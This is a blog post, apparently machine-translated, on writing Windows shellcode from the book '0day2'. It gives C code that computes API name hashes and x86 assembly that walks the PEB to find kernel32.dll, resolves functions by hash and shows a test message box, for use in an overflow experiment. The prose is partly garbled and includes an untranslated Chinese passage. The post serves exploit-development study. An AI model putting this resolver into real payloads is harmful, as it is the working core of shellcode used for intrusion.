Book review: 0day2 [4] dynamic acquisition function.

Recommended for you: Get network issues from WhatsUp Gold. Not end users.

Through the above 3 articles of learning, we can gain access to the kernel32.dll address of the next we get several important functions

1.GetProcAddress 2.LoadLibrary with these two functions many functions can be found, the ultimate purpose of this section is to find the two functions, in order to facilitate the testing and verification we need dynamic acquisition under the MessageBoxA function, the pop-up dialog window, but also safety exit that we must use ExitProcess.


Then we combine 0day2 third chapters of the knowledge, the corresponding function name to search through hash, indirect acquisition function.

First we find hash

 1 #include "stdafx.h"
 2 #include <stdio.h>
 3 #include <windows.h>
 4 DWORD GetHash(char *fname)
 5 {
 6     printf("%s",fname);
 7     DWORD dret = 0;
 8     while(*fname)
 9     {
10         dret = ((dret<<25)|(dret>>7));
11         dret += *fname;
12         fname++;
13     }
14     printf(" function`s hash is %.8x\n",dret);
15     return dret;
16 }
17 int main(int argc, char* argv[])
18 {
19     //char fname[]={"MessageBoxA"};
20     //DWORD dret = GetHash(fname);
21     Gethash("ExitProcess");
22     GetHash("MessageBoxA");
23     GetHash("LoadLibraryA");
24     GetHash("GetProcAddress");
25     return 0;
26 }
MessageBoxA function`s hash is 1e380a6a
ExitProcess function`s hash is 4fd18963
LoadLibraryA function`s hash is 0c917432
GetProcAddress function`s hash is bbafdf85

Code execution results.



  1     nop
  2     nop
  3     nop
  4     nop
  5     CLD                    // clear flag DF
  6     push 0x1e380a6a        //msg hash
  7     push 0x4fd18963        // exit hash
  8     push 0x0c917432        //LoadL hash
  9     //push 0xbbafdf85        //GetProc hash 
 10     mov esi,esp            //esi = addr of first function GetProc`s addr
 11     lea edi,[esi+0x0c]    //edi = addr of last function msg`s addr
 12 
 13     // make some stack space to protect hash list
 14 
 15     xor ebx,ebx            //ebx = 0
 16     mov bh,0x04
 17     sub esp,ebx         //Esp-0x400 elevation Hash list stack protection
 18     
 19     //push pointer to user32 onto stack
 20     mov bx,0x3233 //23
 21     push ebx
 22     push 0x72657375 //resu
 23     push esp
 24     xor edx,edx
 25 
 26     //find base addr of kernel32dll
 27     mov ebx,fs:[0x30]
 28     mov ecx,[ebx +0x0c]
 29     mov ecx,[ecx +0x1c]    // DLL list
 30     mov ecx,[ecx]        // The 2 list for
 31     mov ecx,[ecx]        // Gets the third linked win7 to add this line, XP notes that
 32     mov ebp,[ecx +0x08]
 33 
 34 find_lib_functions:
 35     
 36     lodsd                    //Characters such as eax transfer ESI the specified
 37     cmp eax,0x1e380a6a
 38 
 39     jne find_functions
 40     xchg eax,ebp
 41     call [edi - 0x8]
 42     xchg eax,ebp
 43 
 44 find_functions:
 45     pushad
 46     mov eax,[ebp+0x3c]
 47     mov ecx,[ebp+eax+0x78]
 48     add ecx,ebp
 49     mov ebx,[ecx+0x20]
 50     add ebx,ebp
 51     xor edi,edi
 52 
 53 next_function_loop:
 54     inc edi
 55     mov esi,[ebx+edi*4]
 56     add esi,ebp
 57     cdq
 58 
 59 hash_loop:
 60     movsx eax,byte ptr[esi]
 61     cmp al,ah
 62     jz compare_hash
 63     ror edx,7
 64     add edx,eax
 65     inc esi
 66     jmp hash_loop
 67 
 68 compare_hash:
 69     cmp edx,[esp+0x1c]
 70     jnz next_function_loop
 71     mov ebx,[ecx+0x24]
 72     add ebx,ebp
 73     mov di,[ebx+2*edi]
 74     mov ebx,[ecx+0x1c]
 75     add ebx,ebp
 76     add ebp,[ebx +4*edi]
 77     xchg eax,ebp
 78     pop edi
 79     stosd
 80     push edi
 81     popad 
 82     cmp eax,0x1e380a6a
 83     jne find_lib_functions
 84 
 85 function_call:
 86     xor ebx,ebx
 87     push ebx
 88     push 0x61616161
 89     push 0x62626262
 90     mov eax,esp
 91     push ebx
 92     push eax
 93     push eax
 94     push ebx
 95     call [edi-0x04]
 96     push ebx
 97     call [edi-0x08]
 98     nop
 99     nop
100     nop
101     nop

The above code can run successfully in the win7, is not compatible with XP, to comment out the 31 line test XP.


So we have to think of a way.


To solve the XP win7 compatibility issues, the following code from watching the snow thank cryin

But unfortunately this method in Win7 is not suitable, so the base address is happy to give you a new way to see the share foreign web sites to locate kernel32.dl, this method can be used in all versions of windows! This method to locate the base address it through the InInitializationOrderModuleList find kernel32.dll module name length, because "the last character in the kernel32.dll" as "但非常可惜的是这种方法在Win7下是不适用的, 所以很高兴现在给大家分享国外网站上看到的一种新的方法来定位kernel32.dl的基地址, 该方法可以在所有windows版本上适用!这种方法通过在InInitializationOrderModuleList中查找kernel32.dll模块名称的长度来定位它的基地址, 因为"kernel32.dll"的最后一个字符为"\0"结束符" Terminator. So if the module the last byte"\0"You can positionkernel32.dllAddress, 具体代码实现方法: ;find kernel32.dll find_kernel32: push esi xor ecx, ecx mov esi, [fs:ecx+0x30] mov esi, [esi + 0x0c] mov esi, [esi + 0x1c] next_module: mov eax, [esi + 0x8] mov edi,[esi+0x20] mov esi ,[esi] cmp [edi+12*2],cx     //Judgment 12 Character is the end of the string, Kernel32.dll is the 12 jne next_module pop ESI Ret length

After renovation and test (the test code XP win7) assembly code



  1 // Compatible with win7 XP to obtain kernel32.dll address, find the required function and pop test
  2     _asm
  3     {
  4                 nop
  5                 nop
  6                 nop
  7                 nop
  8                 CLD                                // clear flag DF
  9                 push 0x1e380a6a                    //msg hash
 10                 push 0x4fd18963                    // exit hash
 11                 push 0x0c917432                    //LoadL hash
 12                 //push 0xbbafdf85                //GetProc hash 
 13                 mov esi,esp                        //esi = addr of first function GetProc`s addr
 14                 lea edi,[esi+0x0c]                //edi = addr of last function msg`s addr
 15                 
 16                 // make some stack space to protect hash list
 17                 
 18                 xor ebx,ebx                        //ebx = 0
 19                 mov bh,0x04
 20                 sub esp,ebx                        //Esp-0x400 elevation Hash list stack protection
 21                 
 22                 //push pointer to user32 onto stack
 23                 mov bx,0x3233                    //23
 24                 push ebx
 25                 push 0x72657375                    //resu
 26                 push esp
 27                 xor edx,edx
 28                 
 29                 //find base addr of kernel32dll
 30 find_kernel32:
 31                 mov ebx,fs:[edx + 0x30]       // Add this EDX can shorten the length of shellcode, no 00
 32                 mov ecx,[ebx +0x0c]
 33                 mov ecx,[ecx +0x1c]                // DLL list
 34                 //mov ecx,[ecx]                    // The 2 list for
 35                 //mov ecx,[ecx]                    // Gets the third list
 36                 push edi
 37                 push esi
 38 next_module:
 39                 
 40                 mov ebp,[ecx +0x08]                // DLL address
 41                 mov edi,[ecx+0x20]                 // AddressOfNames
 42                 mov ecx,[ecx]
 43                 cmp [edi+12*2],dx
 44                 jne next_module
 45                 
 46                 pop esi
 47                 pop edi
 48 
 49                 
 50 find_lib_functions:
 51             
 52                 lodsd                            //Characters such as eax transfer ESI the specified
 53                 cmp eax,0x1e380a6a
 54                 
 55                 jne find_functions
 56                 xchg eax,ebp
 57                 call [edi - 0x8]
 58                 xchg eax,ebp
 59                 
 60 find_functions:
 61                 pushad
 62                 mov eax,[ebp+0x3c]
 63                 mov ecx,[ebp+eax+0x78]
 64                 add ecx,ebp
 65                 mov ebx,[ecx+0x20]
 66                 add ebx,ebp
 67                 xor edi,edi
 68                 
 69 next_function_loop:
 70                 inc edi
 71                 mov esi,[ebx+edi*4]
 72                 add esi,ebp
 73                 cdq
 74                 
 75 hash_loop:
 76             movsx eax,byte ptr[esi]
 77                 cmp al,ah
 78                 jz compare_hash
 79                 ror edx,7
 80                 add edx,eax
 81                 inc esi
 82                 jmp hash_loop
 83                 
 84 compare_hash:
 85                 cmp edx,[esp+0x1c]
 86                 jnz next_function_loop
 87                 mov ebx,[ecx+0x24]
 88                 add ebx,ebp
 89                 mov di,[ebx+2*edi]
 90                 mov ebx,[ecx+0x1c]
 91                 add ebx,ebp
 92                 add ebp,[ebx +4*edi]
 93                 xchg eax,ebp
 94                 pop edi
 95                 stosd
 96                 push edi
 97                 popad 
 98                 cmp eax,0x1e380a6a
 99                 jne find_lib_functions
100                 
101 function_call:
102                 xor ebx,ebx
103                 push ebx
104                 push 0x61616161
105                 push 0x62626262
106                 mov eax,esp
107                 push ebx
108                 push eax
109                 push eax
110                 push ebx
111                 call [edi-0x04]
112                 push ebx
113                 call [edi-0x08]
114                 nop
115                 nop
116                 nop
117                 nop
118     }

This code is compatible with xp_win7 window

Then we extract shellcode, and combined with the first lesson, do overflow experiment

Thanks to failwest, cryin

Recommended from our users: Dynamic Network Monitoring from WhatsUp Gold from IPSwitch. Free Download

Posted by Noel at December 14, 2013 - 12:43 AM